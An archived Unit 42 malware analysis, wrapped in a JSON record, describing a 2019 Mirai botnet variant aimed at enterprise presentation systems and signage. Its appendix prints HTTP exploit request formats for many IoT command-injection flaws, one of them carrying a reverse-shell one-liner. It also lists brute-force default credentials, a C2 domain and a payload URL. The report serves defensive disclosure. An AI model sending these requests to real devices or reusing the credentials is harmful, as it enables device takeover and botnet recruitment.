{
	"id": "f2328766-5b29-4c51-a7bd-d5048a34ab20",
	"created_at": "2026-04-10T03:21:25.122384Z",
	"updated_at": "2026-04-10T03:22:17.35164Z",
	"deleted_at": null,
	"sha1_hash": "f8db63e25294a89dedbaafecef450dda3b9042a2",
	"title": "New Mirai Variant Targets Enterprise Wireless Presentation \u0026 Display Systems",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 228632,
	"plain_text": "New Mirai Variant Targets Enterprise Wireless Presentation \u0026 Display\r\nSystems\r\nBy Ruchna Nigam\r\nPublished: 2019-03-18 · Archived: 2026-04-10 03:03:43 UTC\r\nExecutive Summary\r\nIn early January 2019, Unit 42 discovered a new variant of the infamous IoT/Linux botnet Mirai.\r\nMirai is best known for being used in massive, unprecedented DDoS attacks in 2016. Some of the most notable targets\r\nincluded: web hosting provider OVH, DNS provider Dyn and Brian Krebs’ website.\r\nThis new variant that Unit 42 discovered is notable for targeting different embedded devices like routers, network storage\r\ndevices, NVRs, and IP cameras and using numerous exploits against them.\r\nIn particular, Unit 42 found this new variant targeting WePresent WiPG-1000 Wireless Presentation systems and LG\r\nSupersign TVs. Both of these devices are intended for use by businesses. This development indicates to us a potential shift to\r\nusing Mirai to target enterprises. The previous instance where we observed the botnet targeting enterprise vulnerabilities was\r\nwith the incorporation of exploits against Apache Struts and SonicWall.\r\nIn addition to this newer targeting, this new variant of Mirai includes new exploits in its multi-exploit battery, as well as new\r\ncredentials to use in brute force against devices.\r\nFinally, the malicious payload was hosted at a compromised website in Colombia: an \"Electronic security, integration and\r\nalarm monitoring\" business.\r\nThese new features afford the botnet a large attack surface. In particular, targeting enterprise links also grants it access to\r\nlarger bandwidth, ultimately resulting in greater firepower for the botnet for DDoS attacks.\r\nThese developments underscore the importance for enterprises to be aware of the IoT devices on their network, change\r\ndefault passwords, and ensure that devices are fully up to date on patches. Devices that cannot be patched should, as a last resort, be\r\nremoved from the network.\r\nExploits\r\nThis latest sample contains a total of 27 exploits, of which 11 are new to Mirai.\r\nA full list of the exploits we have observed is in the Appendix. Table 1 lists exploits that haven’t been observed in the\r\nwild prior to this sample and Table 2 lists other exploits included in this variant that have been observed only recently in the wild\r\nbut were incorporated in variants prior to this one.\r\nOther Features\r\nAside from the incorporation of unusual exploits, this new variant had some other differentiating features:\r\nIt makes use of the same encryption scheme as is characteristic of Mirai with a table key of 0xbeafdead.\r\nWhen decrypting strings using this key, we found certain unusual default credentials for brute force that we haven’t\r\ncome across until now:\r\nadmin:huigu309\r\nroot:huigu309\r\nCRAFTSPERSON:ALC#FGU\r\nroot:videoflow\r\nIt uses the domain epicrustserver[.]cf at port 3933 for C2 communication.\r\nIn addition to scanning for other vulnerable devices, the new version can be commanded to send out HTTP Flood\r\nDDoS attacks.\r\nInfrastructure\r\nIronically, the shell script payload (still live, at the time of this writing) fetched by the exploits in this variant is hosted at the\r\ncompromised website for an \"Electronic security, integration and alarm monitoring\" business in Colombia.\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/\r\nPage 1 of 9\n\nFigure 1. Shell script payload fetched by exploits\r\nAdditionally, the binaries downloaded by the shell script were named in the format “clean.[arch]” (e.g. clean.x86,\r\nclean.mips etc.); however, they don’t appear to be hosted at the website any longer.\r\nPivoting on the payload source revealed some samples fetching the same payload that were hosted at\r\n185[.]248.140.102/bins/. 
The same IP was hosting some Gafgyt samples using the name format “eeppinen.[arch]” a few\r\ndays prior to the upgrade to this new multi-exploit variant.\r\nConclusion\r\nIoT/Linux botnets continue to expand their attack surface, either by the incorporation of multiple exploits targeting a\r\nplethora of devices, or by adding to the list of default credentials they brute force, or both. In addition, targeting enterprise\r\nvulnerabilities allows them access to links with potentially larger bandwidth than consumer device links, affording them\r\ngreater firepower for DDoS attacks.\r\nPalo Alto Networks customers are protected by:\r\nWildFire detects all related samples with malicious verdicts.\r\nAll exploits and IPs/URLs involved in these campaigns are blocked through Threat Prevention and PANDB.\r\nAutoFocus customers can track these activities using individual exploit tags:\r\nCVE-2018-17173\r\nWePresentCmdInjection\r\nDLinkRCE\r\nZyxelP660HN_RCE\r\nCVE-2016-1555\r\nNetgearDGN2200_RCE\r\nNetgearProsafeRCE\r\nNetgearReadyNAS_RCE\r\nLinksysWAP54Gv3_RCE\r\nCVE-2013-3568\r\nZTEH108L_RCE\r\nThe malware family can be tracked in AutoFocus using the tag ELFMirai\r\nAppendix\r\n\r\nVulnerability: CVE-2018-17173\r\nAffected Devices: LG Supersign TVs\r\nExploit Request Format:\r\nGET /qsrserver/device/getThumbnail?sourceUri=''+-;rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f+|+/bin/sh+-i+2\u003e\u00261+|+;%\r\n\u003e/tmp/f\r\n;\u0026targetUri=/tmp/thumb/test.jpg\u0026mediaType=image\u0026targetWidth=400\u0026targetHeight=400\u0026scaleType=crop\u0026=153\r\nHTTP/1.1\r\nUser-Agent: Hello, world\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\n\r\nVulnerability: WePresent WiPG-1000 Command Injection\r\nAffected Devices: WePresent WiPG-1000 Wireless Presentation systems\r\nExploit Request Format:\r\nPOST /cgi-bin/rdfs.cgi HTTP/1.1\r\nHost: [IP]:[Port]\r\nContent-Type: application/x-www-form-Content-Length: 1024 Client=;%s+wepresent_p%d;\u0026Download=submit\r\n\r\nVulnerability: DLink DCS-930L Remote Command Execution\r\nAffected Devices: DLink DCS-930L Network Video Cameras\r\nExploit Request Format:\r\nPOST /setSystemCommand HTTP/1.1\r\nHost: [IP]:[Port]\r\nAuthorization: Basic YWRtaW46\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 1024\r\nConnection: keep-alive\r\nReplySuccessPage=docmd.htm\u0026ReplyErrorPage=docmd.htm\u0026SystemCommand=%s+dcs930l_p%d;\u0026ConfigSyste\r\n\r\nVulnerability: DLink diagnostic.php Command Execution\r\nAffected Devices: DLink DIR-645, DIR-815 Routers\r\nExploit Request Format:\r\nPOST /diagnostic.php HTTP/1.\r\nHost: [IP]:[Port]\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 512\r\nact=ping\u0026dst=\u0026+;%s+dlinkdir_p%d;\u0026\r\n\r\nVulnerability: Zyxel P660HN Remote Command Execution\r\nAffected Devices: Zyxel P660HN-T routers\r\nExploit Request Format:\r\nPOST /cgi-bin/pages/maintenance/logSetting/logSet.asp HTTP/1.1\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nlogSetting_H=1\u0026active=1\u0026logMode=LocalAndRemote\u0026serverPort=123\u0026serverIP=1.1.1.1 ;%s+P660HN-T_p%d; \u0026#\r\nPOST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nremote_submit_Flag=1\u0026remote_syslog_Flag=1\u0026RemoteSyslogSupported=1\u0026LogFlag=0\u0026remote_host=;%s+P660\r\nT_p%d;#\u0026remoteSubmit=Save\r\n\r\nVulnerability: CVE-2016-1555\r\nAffected Devices: Netgear WG102, WG103, WN604, WNDAP350, WNDAP360, WNAP320, WNAP210, WNDAP660, WNDAP620 devices\r\nExploit Request Format:\r\nGET /boardData102.php?writeData=true\u0026reginfo=0\u0026macAddress=+001122334455+-c+0+;%s+netgear102_p%d;+\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nGET /boardData103.php?writeData=true\u0026reginfo=0\u0026macAddress=+001122334455+-c+0+;%s+netgear103_p%d;+\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nGET /boardDataNA.php?writeData=true\u0026reginfo=0\u0026macAddress=+001122334455+-c+0+;%s+netgearNA_p%d;+e\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nGET /boardDataWW.php?writeData=true\u0026reginfo=0\u0026macAddress=+001122334455+-c+0+;%s+netgearWW_p%d;\r\nHTTP/1.1\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nGET /boardDataJP.php?writeData=true\u0026reginfo=0\u0026macAddress=+001122334455+-c+0+;%s+netgearJP_p%d;+ech\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\n\r\nVulnerability: CVE-2017-6077, CVE-2017-6334\r\nAffected Devices: Netgear DGN2200 N300 Wireless ADSL2+ Modem Routers\r\nExploit Request Format:\r\nPOST /ping.cgi HTTP/1.1\r\nHost: [IP]:[Port]\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ\r\nReferer: http://%s/DIAG_diag.htm\r\nIPAddr1=12\u0026IPAddr2=12\u0026IPAddr3=12\u0026IPAddr4=12\u0026ping=Ping\u0026ping_IPAddr=12.12.12.12;%s+dgn2200v1_p%\r\nPOST /dnslookup.cgi HTTP/1.1\r\nHost: [IP]:[Port]\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ\r\nReferer: http://%s/DIAG_diag.htm\r\nhost_name=www.google.com;+%s+dgn2200v2_p%d\u0026lookup=Lookup\r\n\r\nVulnerability: Netgear Prosafe Remote Command Execution\r\nAffected Devices: Netgear Prosafe WC9500, WC7600, WC7520 Wireless Controllers\r\nExploit Request Format:\r\nPOST /login_handler.php HTTP/1.1\r\nHost: [IP]:[Port]\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 512\r\nreqMethod=json_cli_reqMethod\u0026json_cli_jsonData=;%s+prosafe_p%d;+echo+ffffffffffffffff\r\n\r\nTable 1 New exploits used in the Mirai variant\r\nSome other exploits included in this variant have been observed only recently in the wild but were incorporated in variants\r\nprior to this one. These exploits are listed in Table 2 below:\r\n\r\nVulnerability: Netgear ReadyNAS Remote Command Execution/CVE-2018-15716\r\nAffected Devices: Netgear ReadyNAS Surveillance 1.4.3-16 and NUUO NVRMini devices\r\nFirst seen (in the wild): Oct, 2017\r\nExploit Format:\r\nGET /upgrade_handle.php?cmd=writeuploaddir\u0026uploaddir=%27;%s+readynas%d;%27  HTTP/1\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\n\r\nVulnerability: Linksys WAP54Gv3 Remote Debug Root Shell\r\nAffected Devices: Linksys WAP54G Wireless Access Points\r\nFirst seen (in the wild): Dec, 2018\r\nExploit Format:\r\nPOST /debug.cgi HTTP/1.1\r\nHost: [IP]:[Port]\r\nContent-Length: 1024\r\nConnection: keep-alive\r\nAuthorization: Basic R2VtdGVrOmdlbXRla3N3ZA\r\ndata1=;%s+wap54gv3%d;\u0026command=ui_debug\r\n\r\nVulnerability: CVE-2013-3568\r\nAffected Devices: Linksys WRT100, WRT110 consumer routers\r\nFirst seen (in the wild): Dec, 2018\r\nExploit Format:\r\nPOST /ping.cgi HTTP/1.1\r\nHost: [IP]:[Port]\r\nContent-Length: 1024\r\nConnection: keep-alive\r\nAuthorization: Basic YWRtaW46YWRtaW4\r\npingstr=\u0026+;%s+wrt100_p%d;\r\n\r\nVulnerability: ZTE Remote Command Execution\r\nAffected Devices: ZTE ZXV10 H108L Routers with \u003c= V1.0.01_WIND_A01\r\nFirst seen (in the wild): Oct, 2018\r\nExploit Format:\r\nGET /getpage.gch?\r\npid=1002\u0026nextpage=manager_dev_ping_t.gch\u0026Host=;+$(;%s+h108l_p%d;)\u0026NumofRepeat=1\u0026\r\nHTTP/1.1\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\n\r\nVulnerability: Linksys apply.cgi Remote Command Execution\r\nAffected Devices: Linksys E1500/E2500 routers\r\nFirst seen (in the wild): -\r\nExploit Format:\r\nPOST /apply.cgi HTTP/1.1\r\nHost: [IP]:[Port]\r\nContent-Length: 1024\r\nConnection: keep-alive\r\nAuthorization: Basic YWRtaW46YWRtaW4\r\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026action=\u0026com\r\nPOST /apply.cgi HTTP/1.1\r\nHost: [IP]:[Port]\r\nContent-Length: 1024\r\nConnection: keep-alive\r\nAuthorization: Basic 
YWRtaW46YWRtaW4\r\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026action=\u0026com\r\nTable 2 Other exploits in the Mirai variant\r\nThe remaining exploits are ones already observed and written about in the context of previous campaigns are listed below.\r\nCVE-2017-6884\r\nGPON Exploits\r\nAVTechRCE\r\nJAWS RCE\r\nDLinkOSInjection\r\nDLinkcommandphpRCE\r\nDLinkDSL2750BOSCmdInjection\r\nVacronNVRRCE\r\nNetgain ‘ping’ Command Injection\r\nEnGeniusRCE\r\nLinksys RCE\r\nNetgear cgi-bin RCE\r\nIndicators of Compromise\r\nPayload source\r\nhxxp://www.autourbe[.]com.co/autourbe/language/en-GB/windata/wgetbin[.]sh\r\nC2\r\nepicrustserver[.]cf:3933\r\nURLs previously hosting Mirai variant\r\nSamples of new Mirai variant\r\nURLs previously hosting Gafgyt\r\nGafgyt sample hashes\r\nSource: https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/"
	],
	"report_names": [
		"new-mirai-variant-targets-enterprise-wireless-presentation-display-systems"
	],
	"threat_actors": [],
	"ts_created_at": 1775791285,
	"ts_updated_at": 1775791337,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f8db63e25294a89dedbaafecef450dda3b9042a2.pdf",
		"text": "https://archive.orkl.eu/f8db63e25294a89dedbaafecef450dda3b9042a2.txt",
		"img": "https://archive.orkl.eu/f8db63e25294a89dedbaafecef450dda3b9042a2.jpg"
	}
}